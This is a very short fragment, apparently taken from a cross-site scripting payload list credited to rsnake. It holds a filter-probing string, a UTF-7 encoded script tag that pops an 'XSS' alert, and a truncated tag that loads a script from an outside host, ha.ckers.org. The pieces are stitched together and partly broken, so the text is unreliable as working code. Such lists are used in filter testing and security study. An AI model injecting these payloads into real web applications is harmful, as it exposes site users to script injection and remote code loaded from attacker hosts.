# credit to rsnake '';!--"=&{()} SRC= echo(' +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- PT SRC="http://ha.ckers.org/xss.js">